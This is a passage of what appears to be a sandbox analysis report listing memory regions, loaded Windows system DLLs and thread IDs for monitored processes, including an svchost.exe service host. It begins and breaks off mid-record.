start_va = 0x7ffaf3070000 end_va = 0x7ffaf3097fff entry_point = 0x7ffaf3070000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 1760 start_va = 0xdef61a0000 end_va = 0xdef61a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def61a0000" filename = "" Region: id = 1761 start_va = 0x7ffaebd70000 end_va = 0x7ffaec0acfff entry_point = 0x7ffaebd70000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1762 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1763 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 1764 start_va = 0xdef65e0000 end_va = 0xdef65e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def65e0000" filename = "" Region: id = 1765 start_va = 0xdef65f0000 end_va = 0xdef65f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def65f0000" filename = "" Region: id = 1766 start_va = 0xdef6ad0000 end_va = 0xdef6bcffff entry_point = 0x0 region_type = private name = "private_0x000000def6ad0000" filename = "" Region: id = 1767 start_va = 0xdef6bd0000 end_va = 0xdef6ccffff entry_point = 0x0 region_type = private name = "private_0x000000def6bd0000" filename = "" Region: id = 1768 start_va = 0x7ff726b57000 end_va = 0x7ff726b58fff entry_point = 0x0 region_type = private name = "private_0x00007ff726b57000" filename = "" Region: id = 1769 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1770 start_va = 0xdef6cd0000 end_va = 0xdef6dcffff entry_point = 0x0 region_type = private name = "private_0x000000def6cd0000" filename = "" Region: id = 1771 start_va = 0x7ff726b55000 end_va = 0x7ff726b56fff entry_point = 0x0 region_type = private name = "private_0x00007ff726b55000" filename = "" Region: id = 1772 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1773 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1774 start_va = 0xdef6dd0000 end_va = 0xdef6ecffff entry_point = 0x0 region_type = private name = "private_0x000000def6dd0000" filename = "" Region: id = 1775 start_va = 0xdef6ed0000 end_va = 0xdef6fcffff entry_point = 0x0 region_type = private name = "private_0x000000def6ed0000" filename = "" Region: id = 1776 start_va = 0xdef6fd0000 end_va = 0xdef70cffff entry_point = 0x0 region_type = private name = "private_0x000000def6fd0000" filename = "" Region: id = 1777 start_va = 0xdef70d0000 end_va = 0xdef71cffff entry_point = 0x0 region_type = private name = "private_0x000000def70d0000" filename = "" Region: id = 1778 start_va = 0x7ff726a2a000 end_va = 0x7ff726a2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff726a2a000" filename = "" Region: id = 1779 start_va = 0x7ff726a2c000 end_va = 0x7ff726a2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff726a2c000" filename = "" Region: id = 1780 start_va = 0x7ff726a2e000 end_va = 0x7ff726a2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff726a2e000" filename = "" Region: id = 1781 start_va = 0x7ff726b53000 end_va = 0x7ff726b54fff entry_point = 0x0 region_type = private name = "private_0x00007ff726b53000" filename = "" Region: id = 1782 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1783 start_va = 0x7ffaebb50000 end_va = 0x7ffaebb5bfff entry_point = 0x7ffaebb50000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1784 start_va = 0x7ffaeb9b0000 end_va = 0x7ffaebb46fff entry_point = 0x7ffaeb9b0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1785 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1786 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1787 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1788 start_va = 0x7ffaf7920000 end_va = 0x7ffaf7926fff entry_point = 0x7ffaf7920000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 1789 start_va = 0xdef6600000 end_va = 0xdef6600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def6600000" filename = "" Region: id = 1790 start_va = 0x7ffaeb700000 end_va = 0x7ffaeb9a6fff entry_point = 0x7ffaeb700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1791 start_va = 0xdef6610000 end_va = 0xdef6610fff entry_point = 0xdef6610000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1792 start_va = 0xdef71d0000 end_va = 0xdef73cffff entry_point = 0x0 region_type = private name = "private_0x000000def71d0000" filename = "" Region: id = 1793 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1794 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1795 start_va = 0x7ffaebc80000 end_va = 0x7ffaebc94fff entry_point = 0x7ffaebc80000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1796 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1797 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1798 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1799 start_va = 0xdef73d0000 end_va = 0xdef74cffff entry_point = 0x0 region_type = private name = "private_0x000000def73d0000" filename = "" Region: id = 1800 start_va = 0x7ff726a28000 end_va = 0x7ff726a29fff entry_point = 0x0 region_type = private name = "private_0x00007ff726a28000" filename = "" Region: id = 1801 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1802 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1803 start_va = 0xdef74d0000 end_va = 0xdef75cffff entry_point = 0x0 region_type = private name = "private_0x000000def74d0000" filename = "" Region: id = 1804 start_va = 0x7ff726a26000 end_va = 0x7ff726a27fff entry_point = 0x0 region_type = private name = "private_0x00007ff726a26000" filename = "" Region: id = 1805 start_va = 0x7ffaea0a0000 end_va = 0x7ffaea11ffff entry_point = 0x7ffaea0a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1806 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1807 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1808 start_va = 0xdef6620000 end_va = 0xdef6624fff entry_point = 0xdef6620000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1809 start_va = 0xdef6630000 end_va = 0xdef663ffff entry_point = 0xdef6630000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1810 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1811 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1812 start_va = 0xdef6640000 end_va = 0xdef6642fff entry_point = 0xdef6640000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1813 start_va = 0xdef75d0000 end_va = 0xdef76cffff entry_point = 0x0 region_type = private name = "private_0x000000def75d0000" filename = "" Region: id = 1814 start_va = 0x7ffaf3840000 end_va = 0x7ffaf38b3fff entry_point = 0x7ffaf3840000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1815 start_va = 0xdef6650000 end_va = 0xdef6651fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def6650000" filename = "" Region: id = 1816 start_va = 0x7ffae9750000 end_va = 0x7ffae9763fff entry_point = 0x7ffae9750000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1817 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1818 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1819 start_va = 0x7ffae9800000 end_va = 0x7ffae981efff entry_point = 0x7ffae9800000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1820 start_va = 0xdef6660000 end_va = 0xdef6669fff entry_point = 0xdef6660000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1821 start_va = 0xdef76d0000 end_va = 0xdef77cffff entry_point = 0x0 region_type = private name = "private_0x000000def76d0000" filename = "" Region: id = 1822 start_va = 0xdef77d0000 end_va = 0xdef78cffff entry_point = 0x0 region_type = private name = "private_0x000000def77d0000" filename = "" Region: id = 1823 start_va = 0x7ff726a22000 end_va = 0x7ff726a23fff entry_point = 0x0 region_type = private name = "private_0x00007ff726a22000" filename = "" Region: id = 1824 start_va = 0x7ff726a24000 end_va = 0x7ff726a25fff entry_point = 0x0 region_type = private name = "private_0x00007ff726a24000" filename = "" Region: id = 1825 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1826 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1827 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1828 start_va = 0xdef78d0000 end_va = 0xdef7ccffff entry_point = 0x0 region_type = private name = "private_0x000000def78d0000" filename = "" Region: id = 1829 start_va = 0x7ffaf38c0000 end_va = 0x7ffaf38c9fff entry_point = 0x7ffaf38c0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1832 start_va = 0xdef6650000 end_va = 0xdef6650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def6650000" filename = "" Region: id = 1833 start_va = 0xdef6670000 end_va = 0xdef6670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def6670000" filename = "" Region: id = 1834 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1835 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1836 start_va = 0xdef7cd0000 end_va = 0xdef7dcffff entry_point = 0x0 region_type = private name = "private_0x000000def7cd0000" filename = "" Region: id = 1837 start_va = 0x7ff726a20000 end_va = 0x7ff726a21fff entry_point = 0x0 region_type = private name = "private_0x00007ff726a20000" filename = "" Region: id = 1838 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Thread: id = 181 os_tid = 0xee8 Thread: id = 182 os_tid = 0xf08 Thread: id = 183 os_tid = 0xf14 Thread: id = 184 os_tid = 0xf0c Thread: id = 185 os_tid = 0xed8 Thread: id = 186 os_tid = 0xee4 Thread: id = 187 os_tid = 0xedc Thread: id = 188 os_tid = 0xf44 Thread: id = 189 os_tid = 0xf48 Thread: id = 190 os_tid = 0xe98 Thread: id = 191 os_tid = 0xe94 Thread: id = 192 os_tid = 0xe8c Thread: id = 193 os_tid = 0xe90 Thread: id = 213 os_tid = 0x5b0 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47a2b000" os_pid = "0x3a4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0xf00" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e74b" [0xc000000f], "LOCAL" [0x7] Region: id = 1839 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1840 start_va = 0xe733c40000 end_va = 0xe733c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733c40000" filename = "" Region: id = 1841 start_va = 0xe733c50000 end_va = 0xe733c50fff entry_point = 0xe733c50000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1842 start_va = 0xe733c60000 end_va = 0xe733c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733c60000" filename = "" Region: id = 1843 start_va = 0xe733c80000 end_va = 0xe733cfffff entry_point = 0x0 region_type = private name = "private_0x000000e733c80000" filename = "" Region: id = 1844 start_va = 0xe733d00000 end_va = 0xe733d03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733d00000" filename = "" Region: id = 1845 start_va = 0xe733d10000 end_va = 0xe733d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733d10000" filename = "" Region: id = 1846 start_va = 0xe733d20000 end_va = 0xe733d21fff entry_point = 0x0 region_type = private name = "private_0x000000e733d20000" filename = "" Region: id = 1847 start_va = 0xe733d30000 end_va = 0xe733dedfff entry_point = 0xe733d30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1848 start_va = 0xe733df0000 end_va = 0xe733df6fff entry_point = 0x0 region_type = private name = "private_0x000000e733df0000" filename = "" Region: id = 1849 start_va = 0xe733e00000 end_va = 0xe733efffff entry_point = 0x0 region_type = private name = "private_0x000000e733e00000" filename = "" Region: id = 1850 start_va = 0xe733f80000 end_va = 0xe73403ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733f80000" filename = "" Region: id = 1851 start_va = 0xe734040000 end_va = 0xe734046fff entry_point = 0x0 region_type = private name = "private_0x000000e734040000" filename = "" Region: id = 1852 start_va = 0xe734050000 end_va = 0xe734050fff entry_point = 0x0 region_type = private name = "private_0x000000e734050000" filename = "" Region: id = 1853 start_va = 0xe734060000 end_va = 0xe734060fff entry_point = 0x0 region_type = private name = "private_0x000000e734060000" filename = "" Region: id = 1854 start_va = 0xe734070000 end_va = 0xe734070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e734070000" filename = "" Region: id = 1855 start_va = 0xe734080000 end_va = 0xe7340fffff entry_point = 0x0 region_type = private name = "private_0x000000e734080000" filename = "" Region: id = 1856 start_va = 0xe734100000 end_va = 0xe7341fffff entry_point = 0x0 region_type = private name = "private_0x000000e734100000" filename = "" Region: id = 1857 start_va = 0xe734200000 end_va = 0xe734387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e734200000" filename = "" Region: id = 1858 start_va = 0xe734390000 end_va = 0xe734510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e734390000" filename = "" Region: id = 1859 start_va = 0xe734520000 end_va = 0xe734595fff entry_point = 0xe734520000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 1860 start_va = 0xe7345a0000 end_va = 0xe7345b1fff entry_point = 0xe7345a0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1861 start_va = 0xe7345c0000 end_va = 0xe7345c4fff entry_point = 0xe7345c0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1862 start_va = 0xe7345d0000 end_va = 0xe7345d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7345d0000" filename = "" Region: id = 1863 start_va = 0xe7345e0000 end_va = 0xe7345e1fff entry_point = 0xe7345e0000 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 1864 start_va = 0xe7345f0000 end_va = 0xe7345f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7345f0000" filename = "" Region: id = 1865 start_va = 0xe734620000 end_va = 0xe734956fff entry_point = 0xe734620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1866 start_va = 0xe734b60000 end_va = 0xe734c5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734b60000" filename = "" Region: id = 1867 start_va = 0xe734c60000 end_va = 0xe734d5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734c60000" filename = "" Region: id = 1868 start_va = 0xe734d60000 end_va = 0xe734e5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734d60000" filename = "" Region: id = 1869 start_va = 0xe734e60000 end_va = 0xe734f5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734e60000" filename = "" Region: id = 1870 start_va = 0xe734f60000 end_va = 0xe735f5ffff entry_point = 0xe734f60000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 1871 start_va = 0xe736060000 end_va = 0xe73615ffff entry_point = 0x0 region_type = private name = "private_0x000000e736060000" filename = "" Region: id = 1872 start_va = 0xe736300000 end_va = 0xe7363fffff entry_point = 0x0 region_type = private name = "private_0x000000e736300000" filename = "" Region: id = 1873 start_va = 0xe736b60000 end_va = 0xe736c5ffff entry_point = 0x0 region_type = private name = "private_0x000000e736b60000" filename = "" Region: id = 1874 start_va = 0xe736d00000 end_va = 0xe736dfffff entry_point = 0x0 region_type = private name = "private_0x000000e736d00000" filename = "" Region: id = 1875 start_va = 0xe736e00000 end_va = 0xe736efffff entry_point = 0x0 region_type = private name = "private_0x000000e736e00000" filename = "" Region: id = 1876 start_va = 0xe736f00000 end_va = 0xe736ffffff entry_point = 0x0 region_type = private name = "private_0x000000e736f00000" filename = "" Region: id = 1877 start_va = 0xe737200000 end_va = 0xe7372fffff entry_point = 0x0 region_type = private name = "private_0x000000e737200000" filename = "" Region: id = 1878 start_va = 0xe737300000 end_va = 0xe7373fffff entry_point = 0x0 region_type = private name = "private_0x000000e737300000" filename = "" Region: id = 1879 start_va = 0xe737400000 end_va = 0xe7374fffff entry_point = 0x0 region_type = private name = "private_0x000000e737400000" filename = "" Region: id = 1880 start_va = 0xe737500000 end_va = 0xe7375defff entry_point = 0xe737500000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1881 start_va = 0xe7375e0000 end_va = 0xe7376dffff entry_point = 0x0 region_type = private name = "private_0x000000e7375e0000" filename = "" Region: id = 1882 start_va = 0xe7376e0000 end_va = 0xe7377dffff entry_point = 0x0 region_type = private name = "private_0x000000e7376e0000" filename = "" Region: id = 1883 start_va = 0xe737800000 end_va = 0xe7378fffff entry_point = 0x0 region_type = private name = "private_0x000000e737800000" filename = "" Region: id = 1884 start_va = 0xe737a00000 end_va = 0xe737afffff entry_point = 0x0 region_type = private name = "private_0x000000e737a00000" filename = "" Region: id = 1885 start_va = 0xe737d00000 end_va = 0xe737dfffff entry_point = 0x0 region_type = private name = "private_0x000000e737d00000" filename = "" Region: id = 1886 start_va = 0xe737e00000 end_va = 0xe7385fffff entry_point = 0xe737e00000 region_type = mapped_file name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat") Region: id = 1887 start_va = 0x7df5ff870000 end_va = 0x7ff5ff86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff870000" filename = "" Region: id = 1888 start_va = 0x7ff7877a6000 end_va = 0x7ff7877a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877a6000" filename = "" Region: id = 1889 start_va = 0x7ff7877ac000 end_va = 0x7ff7877adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877ac000" filename = "" Region: id = 1890 start_va = 0x7ff7877b0000 end_va = 0x7ff7877b1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b0000" filename = "" Region: id = 1891 start_va = 0x7ff7877b2000 end_va = 0x7ff7877b3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b2000" filename = "" Region: id = 1892 start_va = 0x7ff7877b4000 end_va = 0x7ff7877b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b4000" filename = "" Region: id = 1893 start_va = 0x7ff7877b6000 end_va = 0x7ff7877b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b6000" filename = "" Region: id = 1894 start_va = 0x7ff7877b8000 end_va = 0x7ff7877b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b8000" filename = "" Region: id = 1895 start_va = 0x7ff7877be000 end_va = 0x7ff7877bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7877be000" filename = "" Region: id = 1896 start_va = 0x7ff7877c0000 end_va = 0x7ff7877c1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c0000" filename = "" Region: id = 1897 start_va = 0x7ff7877c2000 end_va = 0x7ff7877c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c2000" filename = "" Region: id = 1898 start_va = 0x7ff7877c8000 end_va = 0x7ff7877c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c8000" filename = "" Region: id = 1899 start_va = 0x7ff7877ca000 end_va = 0x7ff7877cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877ca000" filename = "" Region: id = 1900 start_va = 0x7ff7877cc000 end_va = 0x7ff7877cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877cc000" filename = "" Region: id = 1901 start_va = 0x7ff7877ce000 end_va = 0x7ff7877cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7877ce000" filename = "" Region: id = 1902 start_va = 0x7ff7877d0000 end_va = 0x7ff7878cffff entry_point = 0x0 region_type = 